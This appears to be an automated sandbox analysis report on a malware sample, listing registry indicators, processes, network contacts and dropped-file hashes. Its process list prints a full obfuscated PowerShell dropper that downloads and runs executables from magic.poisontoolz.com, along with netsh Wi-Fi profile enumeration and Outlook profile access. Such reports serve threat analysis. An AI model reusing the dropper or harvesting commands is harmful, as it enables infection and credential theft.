| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2236 set thread context of 2348 | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | C:\Users\Admin\AppData\Roaming\File1crypt.exe |
| PID 3396 set thread context of 2112 | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | C:\Users\Admin\AppData\Roaming\File2crypt.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bTBrpbwC($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA){[IO.File]::WriteAllBytes($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA)};function qMgSdvYIRRUSjZ($sLUJNuBgfBfA){if($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71005,71013,71013))) -eq $True){rundll32.exe $sLUJNuBgfBfA }elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71017,71020,70954))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $sLUJNuBgfBfA}elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71014,71020,71010))) -eq $True){misexec /qn /i $sLUJNuBgfBfA}else{Start-Process $sLUJNuBgfBfA}};function qKOlApTVNWImMHKgKrr($HXvvEsCPxrUIJvZa){$HFhjjojUglemTDI = New-Object (HEiDtQybOoyVmdi @(70983,71006,71021,70951,70992,71006,71003,70972,71013,71010,71006,71015,71021));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DKUZcAdbQOceyyJA = $HFhjjojUglemTDI.DownloadData($HXvvEsCPxrUIJvZa);return $DKUZcAdbQOceyyJA};function HEiDtQybOoyVmdi($neuW){$LuPJsyaVetOy=70905;$rnhDacIHSobOT=$Null;foreach($OQvtigeOZOgrvp in $neuW){$rnhDacIHSobOT+=[char]($OQvtigeOZOgrvp-$LuPJsyaVetOy)};return $rnhDacIHSobOT};function kISEaSmnymA(){$iKWnDWTBqeifbvN = $env:AppData + '\';$MdErWExzJnRFtj = $iKWnDWTBqeifbvN + 'Document.pdf';If(Test-Path -Path $MdErWExzJnRFtj){Invoke-Item $MdErWExzJnRFtj;}Else{ $QXivrbIwhnWacVVIbm = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70973,71016,71004,71022,71014,71006,71015,71021,70951,71017,71005,71007));bTBrpbwC $MdErWExzJnRFtj $QXivrbIwhnWacVVIbm;Invoke-Item $MdErWExzJnRFtj;};$BzjEeQAv = $iKWnDWTBqeifbvN + 'File1crypt.exe'; if (Test-Path -Path $BzjEeQAv){qMgSdvYIRRUSjZ $BzjEeQAv;}Else{ $ELYbsewlypYz = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70954,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $BzjEeQAv $ELYbsewlypYz;qMgSdvYIRRUSjZ $BzjEeQAv;}$kYEycGaL = $iKWnDWTBqeifbvN + 'File2crypt.exe'; if (Test-Path -Path $kYEycGaL){qMgSdvYIRRUSjZ $kYEycGaL;}Else{ $sEFREXgUWGLv = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70955,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $kYEycGaL $sEFREXgUWGLv;qMgSdvYIRRUSjZ $kYEycGaL;};;;;}kISEaSmnymA;
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"
C:\Users\Admin\AppData\Roaming\File2crypt.exe
"C:\Users\Admin\AppData\Roaming\File2crypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7976D2701938C143CEEE98EB0DBD760E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7976D2701938C143CEEE98EB0DBD760E --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=98176EE9CEE33A0427A03A4DE26D771B --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=31B3ACEAC2102F4B7E0CEBE272B054CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=31B3ACEAC2102F4B7E0CEBE272B054CE --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
C:\Users\Admin\AppData\Roaming\File1crypt.exe
"C:\Users\Admin\AppData\Roaming\File1crypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5E53667CAD71A60515A0E3471FB2C312 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65AE344A690A01991423F40BD6EDF808 --mojo-platform-channel-handle=2008 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC1DB1F616B341ACA525D2BE32A5071A --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv apyXpiSGQEezF0sqZFyx6g.0.2
C:\Users\Admin\AppData\Roaming\File1crypt.exe
C:\Users\Admin\AppData\Roaming\File1crypt.exe
C:\Users\Admin\AppData\Roaming\File2crypt.exe
C:\Users\Admin\AppData\Roaming\File2crypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 172.67.162.192:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 152.199.19.74:80 | tcp | |
| GB | 104.77.160.14:80 | tcp | |
| GB | 23.37.0.169:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.167.17.97:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.167.17.97:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.165.165.26:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.3.187.198:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 40.127.169.103:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 40.127.169.103:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.77.160.28:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 208.95.112.1:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 149.154.167.220:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.129.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.114.97:80 | tcp | |
| GB | 96.17.179.41:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.114.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 151.80.29.83:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 136.175.8.205:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.114.97:80 | tcp | |
| N/A | 162.159.129.233:443 | tcp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.111.229.19:443 | tcp | |
| US | 8.8.8.8:53 | udp |
Files
memory/4468-0-0x0000000004C00000-0x0000000004C36000-memory.dmp
memory/4468-3-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4468-2-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4468-1-0x0000000072170000-0x0000000072920000-memory.dmp
memory/4468-4-0x00000000053B0000-0x00000000059D8000-memory.dmp
memory/4468-6-0x0000000005B10000-0x0000000005B76000-memory.dmp
memory/4468-5-0x0000000005310000-0x0000000005332000-memory.dmp
memory/4468-12-0x0000000005B80000-0x0000000005BE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklsy1xw.nft.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-17-0x0000000005CF0000-0x0000000006044000-memory.dmp
memory/4468-18-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/4468-19-0x00000000061E0000-0x000000000622C000-memory.dmp
memory/4468-22-0x0000000006740000-0x0000000006762000-memory.dmp
memory/4468-23-0x0000000007A40000-0x0000000007FE4000-memory.dmp
memory/4468-21-0x00000000066D0000-0x00000000066EA000-memory.dmp
memory/4468-20-0x00000000073F0000-0x0000000007486000-memory.dmp
memory/4468-24-0x0000000008670000-0x0000000008CEA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Document.pdf
| MD5 | 80a2593453c09724d152e841a3ff0865 |
| SHA1 | c73c293d18aac71c530d69ea03314f064f5c6386 |
| SHA256 | 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd |
| SHA512 | ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67 |
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | d28d630260b12cffcaf5afbd3fcd488d |
| SHA1 | b5b2ffda8805165e393ed23fda6ee02b0de207a0 |
| SHA256 | 5515c692e4b0b0d99d139baf53394d4eb2e16b05a7a1c906e1406c207e21c5a0 |
| SHA512 | 81528282cee78b8fdbc795549131bfd2de9c6517664e12228a531999603d14c714faf644587e9618a147e96bf65950388d348c528875d56292d1b924c59cdba8 |
memory/2236-39-0x0000000000070000-0x00000000001B6000-memory.dmp
memory/2236-41-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/2236-43-0x0000000004CD0000-0x0000000004E06000-memory.dmp
memory/2236-47-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-51-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-57-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-63-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-69-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-75-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-81-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-83-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-79-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-85-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-89-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-91-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-93-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-95-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-87-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-97-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-77-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-99-0x0000000004CD0000-0x0000000004E01000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 774c1a62c46b127185ce69e68b3eb323 |
| SHA1 | e3bdad0863ad95c1b21a86c4d510c85cae7020ec |
| SHA256 | 39818ea97715df3133afda16f56775e0f9928424e99f98e99557bd9b4cb12b54 |
| SHA512 | 347a598bb94f87334d776b48bbf647a2390d213c450b8afa866497cb7f5ca8cc57fbd28a7d2b3d279fcf81958948c0a354b7cab5b568f8d3b6fbfe894f4bec74 |
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 5f7664097ffe92ac09565fb443b70849 |
| SHA1 | b8f873c802be357a94d5162ee09f5c3e8ebc46e3 |
| SHA256 | 4467b911160749f59ae0b2308b7270594fc241948aaeda13ff92e7066211f9a3 |
| SHA512 | 52890416edbe90eab2b42dee114680edbab90051234edcde9a00db4b928056b3da1be04af4618a48afad193b76ec28a27c4ee0d7dd8fc3057a2429af0d84e2b9 |
memory/3396-129-0x0000000072170000-0x0000000072920000-memory.dmp
memory/3396-131-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/3396-137-0x0000000004BD0000-0x0000000004DD8000-memory.dmp
memory/3396-140-0x0000000005F80000-0x000000000618A000-memory.dmp
memory/4468-132-0x0000000072170000-0x0000000072920000-memory.dmp
memory/3396-128-0x0000000000040000-0x0000000000258000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | cf17d3928737eab522ebb617737a6dff |
| SHA1 | 5c42ab8b20034607124f97cedb75e34dd80c9172 |
| SHA256 | e9765d102669d5457e38082b367469c3669889d459f5efd0f8a6c260356d2ae5 |
| SHA512 | af4903ecaa217cf3843b793b11ac387a205a3088defef08e4635929ed1de9bdb2c36fba11df17c84ca2b2a691edf2f9d4e51224242538e0bba18c992da0775ab |
memory/2236-115-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-113-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-105-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-101-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-73-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-71-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-67-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-65-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-61-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-59-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-55-0x0000000004CD0000-0x0000000004E01000-memory.dmp
